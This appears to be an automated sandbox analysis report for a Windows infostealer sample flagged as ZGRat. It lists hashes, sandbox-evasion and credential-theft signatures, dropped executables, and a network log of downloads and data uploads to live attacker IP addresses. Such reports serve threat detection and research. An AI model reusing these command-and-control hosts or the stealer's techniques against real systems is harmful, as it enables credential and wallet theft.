Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
15/04/2024, 07:49 UTC
Static task
static1
Behavioral task
behavioral1
Sample
632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe
Resource
win10v2004-20240412-en
General
-
Target
632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe
-
Size
451KB
-
MD5
0f3705608b16d443f564c71e729835f0
-
SHA1
32e6700f07c61b5d0d1b957dd08b11a9a134a596
-
SHA256
632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834
-
SHA512
96e6635bc84fd3d33b98851a8dd36a9b55ecef2efe15546f7621418a92a1da3d117e8515d5ffff55aa5dd2fde529f45da598524aebdebb31a4172f37ded4a634
-
SSDEEP
6144:Nwwu+porkLZy2q8sYoHPVcnWsnrsLuN+rPYqng41EPVp0jGdCGJVQnN3iv:Nz3pGkg2qGcPgrAg+rRQVp0jGPJCnNSv
Malware Config
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral2/memory/4748-120-0x00000173B6540000-0x00000173B9E38000-memory.dmp family_zgrat_v1 behavioral2/memory/4748-125-0x00000173D45E0000-0x00000173D46F0000-memory.dmp family_zgrat_v1 behavioral2/memory/4748-129-0x00000173D4590000-0x00000173D45B4000-memory.dmp family_zgrat_v1 -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 2724 u16g.0.exe 3680 u16g.1.exe -
Loads dropped DLL 2 IoCs
pid Process 2724 u16g.0.exe 2724 u16g.0.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 864 1528 WerFault.exe 76 2248 2724 WerFault.exe 77 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u16g.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u16g.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u16g.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u16g.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u16g.0.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 2724 u16g.0.exe 2724 u16g.0.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 2724 u16g.0.exe 2724 u16g.0.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4748 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe 3680 u16g.1.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1528 wrote to memory of 2724 1528 632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe 77 PID 1528 wrote to memory of 2724 1528 632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe 77 PID 1528 wrote to memory of 2724 1528 632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe 77 PID 1528 wrote to memory of 3680 1528 632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe 80 PID 1528 wrote to memory of 3680 1528 632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe 80 PID 1528 wrote to memory of 3680 1528 632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe 80 PID 3680 wrote to memory of 4748 3680 u16g.1.exe 85 PID 3680 wrote to memory of 4748 3680 u16g.1.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe"C:\Users\Admin\AppData\Local\Temp\632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Users\Admin\AppData\Local\Temp\u16g.0.exe"C:\Users\Admin\AppData\Local\Temp\u16g.0.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2724 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 20443⤵
- Program crash
PID:2248
-
-
-
C:\Users\Admin\AppData\Local\Temp\u16g.1.exe"C:\Users\Admin\AppData\Local\Temp\u16g.1.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 10642⤵
- Program crash
PID:864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1528 -ip 15281⤵PID:4344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2724 -ip 27241⤵PID:1872
Network
-
GEThttp://185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exeRemote address:185.172.128.90:80RequestGET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request90.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request209.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestdownload.iolo.netIN AResponsedownload.iolo.netIN CNAMEiolo0.b-cdn.netiolo0.b-cdn.netIN A185.93.2.245
-
Remote address:8.8.8.8:53Request148.155.9.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN AResponsenexusrules.officeapps.live.comIN CNAMEprod.nexusrules.live.com.akadns.netprod.nexusrules.live.com.akadns.netIN A52.111.243.30
-
Remote address:8.8.8.8:53Request30.243.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestself.events.data.microsoft.comIN AResponseself.events.data.microsoft.comIN CNAMEself-events-data.trafficmanager.netself-events-data.trafficmanager.netIN CNAMEonedscolprdeus18.eastus.cloudapp.azure.comonedscolprdeus18.eastus.cloudapp.azure.comIN A20.42.73.30
-
Remote address:8.8.8.8:53Request30.73.42.20.in-addr.arpaIN PTRResponse
-
GEThttp://185.172.128.228/ping.php?substr=two632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exeRemote address:185.172.128.228:80RequestGET /ping.php?substr=two HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
-
GEThttp://185.172.128.59/syncUpd.exe632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exeRemote address:185.172.128.59:80RequestGET /syncUpd.exe HTTP/1.1
Host: 185.172.128.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 15 Apr 2024 07:45:01 GMT
ETag: "4d800-6161dcc825400"
Accept-Ranges: bytes
Content-Length: 317440
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request228.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestsvc.iolo.comIN AResponsesvc.iolo.comIN A20.157.87.45
-
Remote address:8.8.8.8:53Request245.2.93.185.in-addr.arpaIN PTRResponse245.2.93.185.in-addr.arpaIN PTR185-93-2-245 bunnyinfranet
-
Remote address:8.8.8.8:53Request245.2.93.185.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request59.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request45.87.157.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwestus2-2.in.applicationinsights.azure.comIN AResponsewestus2-2.in.applicationinsights.azure.comIN CNAMEwestus2-2.in.ai.monitor.azure.comwestus2-2.in.ai.monitor.azure.comIN CNAMEwestus2-2.in.ai.privatelink.monitor.azure.comwestus2-2.in.ai.privatelink.monitor.azure.comIN CNAMEgig-ai-prod-westus2-0.trafficmanager.netgig-ai-prod-westus2-0.trafficmanager.netIN CNAMEgig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.comgig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.comIN A20.9.155.148
-
Remote address:8.8.8.8:53Requestwestus2-2.in.applicationinsights.azure.comIN A
-
Remote address:8.8.8.8:53Requestwestus2-2.in.applicationinsights.azure.comIN A
-
GEThttp://185.172.128.228/BroomSetup.exe632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exeRemote address:185.172.128.228:80RequestGET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
Content-Type: application/x-msdos-program
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEGCAAKFBAEGDGCBGCGH
Host: 185.172.128.209
Content-Length: 215
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEHIDHDAKJDHJKEBFIEH
Host: 185.172.128.209
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1520
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHID
Host: 185.172.128.209
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5416
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIDAAFBGDBKJJJKFIIIJ
Host: 185.172.128.209
Content-Length: 4651
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestGET /15f649199f40275b/sqlite3.dll HTTP/1.1
Host: 185.172.128.209
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:27 GMT
Content-Type: application/x-msdos-program
Content-Length: 1106998
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEB
Host: 185.172.128.209
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGIJECFIECBFIDGDAKFH
Host: 185.172.128.209
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestGET /15f649199f40275b/freebl3.dll HTTP/1.1
Host: 185.172.128.209
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:29 GMT
Content-Type: application/x-msdos-program
Content-Length: 685392
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
-
Remote address:185.172.128.209:80RequestGET /15f649199f40275b/mozglue.dll HTTP/1.1
Host: 185.172.128.209
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:30 GMT
Content-Type: application/x-msdos-program
Content-Length: 608080
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
-
Remote address:185.172.128.209:80RequestGET /15f649199f40275b/msvcp140.dll HTTP/1.1
Host: 185.172.128.209
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:32 GMT
Content-Type: application/x-msdos-program
Content-Length: 450024
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
-
Remote address:185.172.128.209:80RequestGET /15f649199f40275b/nss3.dll HTTP/1.1
Host: 185.172.128.209
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:33 GMT
Content-Type: application/x-msdos-program
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
-
Remote address:185.172.128.209:80RequestGET /15f649199f40275b/softokn3.dll HTTP/1.1
Host: 185.172.128.209
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:46 GMT
Content-Type: application/x-msdos-program
Content-Length: 257872
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
-
Remote address:185.172.128.209:80RequestGET /15f649199f40275b/vcruntime140.dll HTTP/1.1
Host: 185.172.128.209
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:47 GMT
Content-Type: application/x-msdos-program
Content-Length: 80880
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE
Host: 185.172.128.209
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK
Host: 185.172.128.209
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2408
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECF
Host: 185.172.128.209
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2052
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHC
Host: 185.172.128.209
Content-Length: 671467
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJ
Host: 185.172.128.209
Content-Length: 2002867
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDG
Host: 185.172.128.209
Content-Length: 15735
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGI
Host: 185.172.128.209
Content-Length: 15731
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAA
Host: 185.172.128.209
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD
Host: 185.172.128.209
Content-Length: 93275
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:185.172.128.209:80RequestPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKF
Host: 185.172.128.209
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 07:49:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
Remote address:20.157.87.45:80RequestPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
ResponseHTTP/1.1 200 OK
content-length: 256
content-type: text/html; charset=utf-8
x-whom: Ioloweb8
date: Mon, 15 Apr 2024 07:49:19 GMT
set-cookie: SERVERID=svc8; path=/
connection: close
-
Remote address:20.157.87.45:80RequestPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
ResponseHTTP/1.1 200 OK
content-length: 192
content-type: text/html; charset=utf-8
x-whom: Ioloweb8
date: Mon, 15 Apr 2024 07:49:34 GMT
set-cookie: SERVERID=svc8; path=/
connection: close
-
185.172.128.90:80http://185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0http632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe388 B 280 B 4 3
HTTP Request
GET http://185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0HTTP Response
200 -
185.172.128.228:80http://185.172.128.228/ping.php?substr=twohttp632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe374 B 279 B 4 3
HTTP Request
GET http://185.172.128.228/ping.php?substr=twoHTTP Response
200 -
185.172.128.59:80http://185.172.128.59/syncUpd.exehttp632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe6.0kB 327.6kB 126 247
HTTP Request
GET http://185.172.128.59/syncUpd.exeHTTP Response
200 -
185.172.128.228:80http://185.172.128.228/BroomSetup.exehttp632220f8a6b61b2ffb8ee16e97f8269c1a98e93dccb484f7e7a4e35d3589c834.exe97.7kB 5.0MB 2069 3746
HTTP Request
GET http://185.172.128.228/BroomSetup.exeHTTP Response
200 -
3.3MB 5.5MB 6449 5348
HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
GET http://185.172.128.209/15f649199f40275b/sqlite3.dllHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
GET http://185.172.128.209/15f649199f40275b/freebl3.dllHTTP Response
200HTTP Request
GET http://185.172.128.209/15f649199f40275b/mozglue.dllHTTP Response
200HTTP Request
GET http://185.172.128.209/15f649199f40275b/msvcp140.dllHTTP Response
200HTTP Request
GET http://185.172.128.209/15f649199f40275b/nss3.dllHTTP Response
200HTTP Request
GET http://185.172.128.209/15f649199f40275b/softokn3.dllHTTP Response
200HTTP Request
GET http://185.172.128.209/15f649199f40275b/vcruntime140.dllHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200HTTP Request
POST http://185.172.128.209/3cd2b41cbde8fc9c.phpHTTP Response
200 -
836 B 721 B 6 6
HTTP Request
POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashxHTTP Response
200 -
2.5MB 61.9MB 42809 44562
-
836 B 657 B 6 6
HTTP Request
POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashxHTTP Response
200 -
20.9.155.148:443westus2-2.in.applicationinsights.azure.comtlsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe2.4kB 5.9kB 13 12
-
641 B 1.1kB 9 9
DNS Request
90.128.172.185.in-addr.arpa
DNS Request
8.8.8.8.in-addr.arpa
DNS Request
209.128.172.185.in-addr.arpa
DNS Request
download.iolo.net
DNS Response
185.93.2.245
DNS Request
148.155.9.20.in-addr.arpa
DNS Request
nexusrules.officeapps.live.com
DNS Response
52.111.243.30
DNS Request
30.243.111.52.in-addr.arpa
DNS Request
self.events.data.microsoft.com
DNS Response
20.42.73.30
DNS Request
30.73.42.20.in-addr.arpa
-
274 B 260 B 4 3
DNS Request
228.128.172.185.in-addr.arpa
DNS Request
svc.iolo.com
DNS Response
20.157.87.45
DNS Request
245.2.93.185.in-addr.arpa
DNS Request
245.2.93.185.in-addr.arpa
-
408 B 530 B 5 3
DNS Request
59.128.172.185.in-addr.arpa
DNS Request
45.87.157.20.in-addr.arpa
DNS Request
westus2-2.in.applicationinsights.azure.com
DNS Request
westus2-2.in.applicationinsights.azure.com
DNS Request
westus2-2.in.applicationinsights.azure.com
DNS Response
20.9.155.148
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
